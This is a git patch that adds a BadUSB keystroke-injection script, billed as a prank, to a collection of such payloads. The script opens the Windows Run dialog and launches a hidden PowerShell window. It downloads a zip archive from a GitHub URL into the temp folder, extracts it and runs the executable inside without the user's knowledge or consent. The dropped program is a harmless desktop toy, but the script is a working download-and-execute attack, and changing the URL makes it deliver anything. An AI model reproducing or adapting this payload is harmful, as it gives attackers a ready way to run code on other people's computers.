From c43b189dcbac710351b620d52d06c06330612afe Mon Sep 17 00:00:00 2001 From: FalsePhilosopher Date: Sun, 21 Aug 2022 04:04:57 -0600 Subject: [PATCH] Set the goose loose --- BadUSB/Honk.txt | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 BadUSB/Honk.txt diff --git a/BadUSB/Honk.txt b/BadUSB/Honk.txt new file mode 100644 index 000000000..cfc723f68 --- /dev/null +++ b/BadUSB/Honk.txt @@ -0,0 +1,16 @@ +REM Title: Desktop Goose +REM Author: FalsePhilosopher +REM Target: Windows 10+ +REM Props: Hak5, https://samperson.itch.io/desktop-goose for the honks,jakoby for some PS bits I used, 3ctOs for the PS bits I used https://github.com/3ct0s/badusb-download-execute-disable-windows-defender and memes +REM Version: 1.0 +REM Category: Prank +REM Downloads and lets loose THE GOOSE!He'll nab your mouse, track mud on your screen... leave you a message, deliver you memes? +REM +REM startup delay +DELAY 300 +GUI r +DELAY 500 +STRING powershell +DELAY 2000 +STRING powershell -w h ($Z="$env:TMP"+'\dg.zip');$D="$env:TMP"+'\dg';curl https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Win/Desktop_Goose/dg.zip -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;$file="$env:TMP"+'\dg\GooseDesktop.exe';$exec=New-Object -com shell.application;$exec.shellexecute($file);exit +ENTER